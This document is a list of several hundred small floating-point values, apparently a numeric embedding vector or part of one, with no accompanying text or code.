0.02538200281560421, 0.02268907055258751, -0.01332332007586956, 0.011359413154423237, -0.0166634488850832, -0.021647606045007706, 0.0217368733137846, 0.009529409930109978, -0.0036190927494317293, 0.04832400009036064, 0.01724369451403618, 0.0036302513908594847, 0.023566877469420433, -0.019386136904358864, 0.029309816658496857, -0.013486978597939014, 0.013710150495171547, -0.01645515486598015, -0.0073386128060519695, 0.005266840104013681, 0.008919408544898033, 0.010332826524972916, -0.014766493812203407, 0.013219173066318035, -0.013048076070845127, 0.009209531359374523, -0.004478301852941513, -0.03225567564368248, 0.016529547050595284, 0.0333268977701664, 0.003965008072555065, -0.013933321461081505, 0.009640995413064957, 0.016737839207053185, -0.00835404172539711, 0.005002754274755716, -0.02200467884540558, 0.004779582843184471, -0.013754784129559994, -0.010355142876505852, -0.0034275376237928867, -0.009179774671792984, 0.020189553499221802, -0.006895989645272493, 0.00782587006688118, -0.011790878139436245, -0.007758918218314648, -0.026512738317251205, 0.0021275654435157776, -0.03817715123295784, -0.015116129070520401, -0.004039398394525051, 0.020844189450144768, -0.0003050006343983114, 0.00292168278247118, -0.002373053692281246, 0.01237112283706665, 0.03264250606298447, -0.013501857407391071, 0.0014627011260017753, -0.025768833234906197, 0.0033122324384748936, 0.01581539772450924, -0.01760076731443405, -0.0036321112420409918, -0.0077886744402348995, -0.02411736734211445, 0.02743517793715, -0.007974650710821152, -0.01760076731443405, 0.014387102797627449, -0.004876290448009968, -0.020546628162264824, -0.0073014176450669765, -0.011351974681019783, -0.00027152494294568896, -0.013784540817141533, 0.013977956026792526, 0.012341367080807686, 0.007509710732847452, -0.003617233131080866, -0.027420300990343094, -0.015830276533961296, 0.0012413897784426808, 0.012943929061293602, -0.002484639175236225, -0.01776442676782608, 0.013122466392815113, 0.03573714569211006, -0.008778066374361515, 0.0016021832125261426, 0.007561783771961927, 0.008606969378888607, -0.005888000130653381, -0.004400191828608513, -0.0054565356113016605, -0.018642233684659004, -0.01855296455323696, -0.003360586240887642, -0.006750928703695536, 0.001774210948497057, 0.03430885076522827, 0.014476370997726917, 0.015250030905008316, 0.0020066809374839067, -0.026096152141690254, -0.0011530511546880007, 0.009068189188838005, -0.027464933693408966, -0.01633613184094429, 0.010987461544573307, -0.019073698669672012, 0.0021759190130978823, 0.0017974579241126776, -0.0005411901511251926, 0.015741007402539253, 0.001135383383370936, 0.00888221338391304, -0.0035316841676831245, 0.009105384349822998, 0.011247827671468258, 0.0037567149847745895, -0.010816363617777824, 0.041063498705625534, 0.001310200896114111, 0.007996967993676662, 0.015116129070520401, -0.003762294305488467, -0.0021182666532695293, 0.020263943821191788, -0.008800383657217026, -0.02480175904929638, -0.00030290838913060725, -0.00687367282807827, -0.0393376424908638, 0.031809333711862564, -0.0019192722393199801, -0.011121364310383797, 0.002795219188556075, -0.0005342160584405065, -0.004217935726046562, -0.0032359822653234005, 0.008309407159686089, 0.014729298651218414, 0.012490147724747658, -0.00927648227661848, 0.007699406240135431, 0.01562198344618082, 0.018463697284460068, 0.010965144261717796, -0.0028900669422000647, -0.012497587129473686, -0.005322632845491171, 0.001645887503400445, -0.017645401880145073, -0.002962597645819187, 0.03401128947734833, -0.002990494016557932, 0.0019508881960064173, 0.018329793587327003, -0.013658076524734497, -0.012460391037166119, 0.0030332684982568026, 0.003345708129927516, 0.005523486994206905, 0.0006853215163573623, 0.003035128116607666, -0.0009531269315630198, -0.001939729554578662, 0.024281024932861328, 0.016470033675432205, 0.004292326048016548, -0.0019527479307726026, -0.010749412700533867, 0.008740871213376522, -0.0068178800866007805, -0.025530783459544182, -0.0215285811573267, 0.003639550181105733, -0.005400742869824171, 0.004310923628509045, 0.012252097949385643, 0.00952197052538395, -0.02252541296184063, 0.004102630540728569, -0.0005416550557129085, -0.02010028436779976, 0.0011530511546880007, -0.03639178350567818, -0.0006425470346584916, -0.0074873934499919415, 0.026393713429570198, 0.0032806165982037783, 0.00255159055814147, 0.003483330365270376, 0.0011000479571521282, 0.020740043371915817, 0.010414655320346355, -0.019891992211341858, 0.0031299758702516556, -0.013286124914884567, 0.01429783459752798, -0.017809061333537102, 0.0040877521969377995, -0.00956660509109497, -0.0027673228178173304, 0.010935388505458832, -0.008822700940072536, 0.0030332684982568026, 0.01760076731443405, 0.010585753247141838, -0.0056759873405098915, 0.02337346225976944, -0.02554566226899624, 0.006163244601339102, -0.0016886619850993156, 0.005088303238153458, -0.0029867745470255613, -0.0047870222479105, -0.034546900540590286, -0.008123431354761124, 0.0018076866399496794, 0.002294943667948246, 0.011969414539635181, 0.0065612331964075565, -0.007424161769449711, 0.03308884799480438, 0.02136492170393467, 0.005594157613813877, 0.0003015135880559683, 0.006189281120896339, 0.013442344963550568, 0.013360515236854553, -0.0027078103739768267, 0.00031081237830221653, -0.0012376701924949884, 0.012252097949385643, 0.0009680050425231457, -0.0041658622212708, 0.032434213906526566, 0.003920373972505331, -0.01519795786589384, 0.023552000522613525, 0.004742387682199478, -0.005214766599237919, 0.010429533198475838, 0.005099461879581213, 0.010176606476306915, -0.006706294137984514, 0.009960873983800411, 0.016633693128824234, 0.0008596740080974996, 0.007554344832897186, 0.020814433693885803, 0.011218071915209293, 0.013278685510158539, 0.011478438042104244, 0.017050279304385185, 0.009916240349411964, 0.015339300036430359, 0.005322632845491171, -0.013769662007689476, 0.0005253821727819741, 0.021350044757127762, 0.0008810612489469349, 0.01745198667049408, -0.0245339535176754, -0.002250309567898512, -0.014022589661180973, 0.006129768677055836, 0.011143681593239307, 0.0006657940684817731, -0.0020568943582475185, 0.00469403387978673, 0.004664277657866478, 0.0028026581276208162, 0.02295687608420849, 0.018061988055706024, 0.0009717245702631772, -0.009603800252079964, -0.0018039671704173088, -0.002423267113044858, 0.042372770607471466, -0.019445650279521942, -0.010184044949710369, -0.016112960875034332, 0.005742938723415136, 0.013784540817141533, -0.03490397334098816, 0.018538087606430054, -0.0041956184431910515, -0.02072516456246376, -0.019847357645630836, 0.013360515236854553, 0.01771979220211506, -0.014454053714871407, -0.00625251280143857, -0.0003340593830216676, 0.004801900126039982, -0.002501377137377858, 0.02956274338066578, -0.007368369027972221, -0.0036283915396779776, -0.009023555554449558, 0.015383933670818806, 0.010243557393550873, 0.00011146935867145658, 0.00999063067138195, 0.019073698669672012, -0.015324422158300877, 0.0016059026820585132, 0.005367266945540905, -0.016529547050595284, -0.0006123259663581848, -0.014312712475657463, -0.006538915913552046, -0.01250502560287714, 0.016425399109721184, 0.017005644738674164, -0.01308527123183012, -0.008316846564412117, 0.0008113202638924122, -0.036510806530714035, 0.0017286468064412475, -0.013501857407391071, 0.006222756579518318, -0.007840747945010662, 0.014945031143724918, 0.007182392757385969, 0.00011937334056710824, -0.020130041986703873, -0.02024906687438488, 0.004586168099194765, 0.010593192651867867, -0.012363684363663197, -0.0010563436662778258, -0.005147815681993961, -0.008919408544898033, 0.00013308906636666507, 0.000932669616304338, 0.015562471002340317, -0.011426365002989769, 0.01971345581114292, 0.027792252600193024, 0.005211047362536192, 0.012832343578338623, 0.018433939665555954, -0.0262895654886961, -0.004556411877274513, -0.004831656347960234, 0.012475269846618176, 0.011939658783376217, -0.000012902084563393146, -0.013650638051331043, 0.01250502560287714, -0.0003389412595424801, 0.03097616136074066, 0.012296732515096664, -0.010533680208027363, -0.014573078602552414, 0.007803552784025669, 0.0011855969205498695, 0.010779168456792831, -0.014617713168263435, 0.023507365956902504, 0.00245302333496511, 0.009633556008338928, -0.00376043445430696, -0.018850525841116905, -0.005731780081987381, -0.01722881570458412, 0.0038868982810527086, -0.005437938030809164, 0.007163795176893473, -0.049633271992206573, -0.011969414539635181, 0.001263706828467548, -0.013152222149074078, -0.0074130031280219555, 0.0077514792792499065, 0.010288191959261894, -0.01456564012914896, 0.013717588968575, 0.0007708704797551036, -0.0023581755813211203, 0.008830140344798565, 0.013494418002665043, -0.009975751861929893, -0.007398124784231186, 0.01361344289034605, 0.029890062287449837, 0.0148036889731884, -0.010317947715520859, 0.008480505086481571, 0.015235153026878834, 0.006788123864680529, -0.012557098641991615, -0.011017218232154846, 0.0052370838820934296, -0.016886619850993156, -0.017526376992464066, 0.000018321541574550793, 0.0003184838860761374, 0.015874911099672318, 0.004515497013926506, 0.011061851866543293, 0.025203466415405273, 0.018597599118947983, 0.00859209056943655, 0.006371537689119577, -0.027628593146800995, -0.0038497031200677156, -0.01398539450019598, 0.0028900669422000647, -0.012943929061293602, -0.010288191959261894, 0.04942497983574867, 0.0061520859599113464, -0.004191898740828037, 0.019579552114009857, 0.004667997360229492, 0.0028937864117324352, -0.005516048055142164, 0.013911004178225994, 0.020844189450144768, -0.0032899153884500265, -0.0006402223370969296, 0.007022453472018242, 0.009603800252079964, -0.026200298219919205, 0.013241490349173546, -0.0008229437517002225, -0.004961839411407709, -0.00025153253227472305, -0.001845811726525426, -0.023224681615829468, -0.010280752554535866, 0.004508058074861765, -0.0070484899915754795, 0.015458324924111366, -0.01292905118316412, -0.00576525554060936, -0.009826971217989922, 0.021275652572512627, -0.00872599333524704, -0.006185561418533325, 0.03475519269704819, 0.007104282733052969, 0.02617054246366024, -0.007026173174381256, 0.0009540568571537733, 0.009975751861929893, -0.017094913870096207, 0.003518665675073862, -0.010035264305770397, -0.018419062718749046, 0.001838372671045363, -0.003965008072555065, 0.002120126271620393, -0.018225647509098053, -0.01809174381196499, 0.005865682847797871, 0.015324422158300877, 0.004288606345653534, 0.01830003783106804, 0.029949573799967766, 0.007379527203738689, 0.009484775364398956, 0.010005508549511433, 0.02258492447435856, 0.0017602627631276846, -0.005054827313870192, -0.006996416952461004, -0.019073698669672012, -0.02886347472667694, 0.007885382510721684, 0.014022589661180973, -0.019162965938448906, -0.004820497706532478, -0.013739906251430511, -0.03039591573178768, 0.02828322909772396, 0.014156492426991463, -0.011776000261306763, -0.00485025392845273, 0.011009778827428818, -0.0004570359888020903, 0.004310923628509045, -0.02658712863922119, -0.009202091954648495, -0.003407080192118883, -0.003267598105594516, -0.0033736045006662607, -0.0171841811388731, 0.00039705875678919256, -0.010637826286256313, 0.02151370234787464, 0.007174953818321228, 0.0013129905564710498, -0.008733432739973068, 0.003178329672664404, -0.010860998183488846, -0.013397710397839546, -0.008703676052391529, -0.016038568690419197, 0.02068052999675274, 0.019326625391840935, 0.007699406240135431, -0.01617247238755226, -0.024459563195705414, -0.0065984283573925495, -0.017169304192066193, -0.01850832998752594, 0.006007024552673101, -0.004961839411407709, 0.01022867951542139, 0.03665958717465401, -0.01141892559826374, 0.012780270539224148, 0.009737703017890453, -0.0073051368817687035, -0.02262955904006958, 0.0013055515009909868, -0.005519767291843891, -0.001339957001619041, 0.005534645635634661, 0.016202228143811226, 0.0026389993727207184, 0.00016249652253463864, 0.0013129905564710498, 0.0069740996696054935, 0.014416858553886414, -0.0018393025966361165, 0.016931254416704178, 0.008078796789050102, -0.006944343447685242, -0.009536849334836006, -0.0028379936702549458, 0.04371179640293121, -0.007870503701269627, 0.018002476543188095, -0.0018885862082242966, 0.005501169711351395, -0.0006062817410565913, 0.00035498166107572615, 0.018151257187128067, -0.01213307399302721, 0.007227026857435703, 0.003905495861545205, -0.008822700940072536, 0.021111994981765747, 0.008078796789050102, 0.006669098976999521, 0.020754920318722725, -0.004139825701713562, 0.03776056692004204, -0.017050279304385185, 0.04463423788547516, 0.005623913835734129, -0.01301087997853756, -0.019802723079919815, 0.003306653117761016, 0.010310509242117405, -0.00403195945546031, -0.023671023547649384, -0.01687174290418625, 0.00559043837711215, 0.017466865479946136, 0.014892957173287868, -0.014677225612103939, -0.004686594940721989, -0.013040636666119099, -0.009365751408040524, -0.00024455843959003687, -0.0016133417375385761, 0.008160626515746117, -0.006159524898976088, 0.00006764876889064908, 0.005463974550366402, 0.007134038954973221, -0.0018941655289381742, -0.010377460159361362, 0.019430771470069885, -0.006962941028177738, 0.002923542633652687, -0.01369527168571949, -0.015562471002340317, -0.01388124842196703, -0.016038568690419197, -0.01612783782184124, 0.001838372671045363, 0.013048076070845127, -0.004794461186975241, -0.0055309259332716465, -0.0007913278532214463, 0.011136242188513279, 0.013628320768475533, 0.004508058074861765, -0.008800383657217026, 0.014074662700295448, 0.017303206026554108, 0.0035800377372652292, -0.008004406467080116, 0.022302240133285522, 0.0034461352042853832, 0.021379800513386726, -0.003991044592112303, -0.01670808345079422, 0.023775171488523483, 0.000024975994165288284, -0.009931118227541447, 0.00057001638924703, -0.016678327694535255, -0.01078660786151886, 0.02966688945889473, 0.02068052999675274, 0.02326931618154049, -0.018047111108899117, 0.0032954944763332605, 0.014483810402452946 ]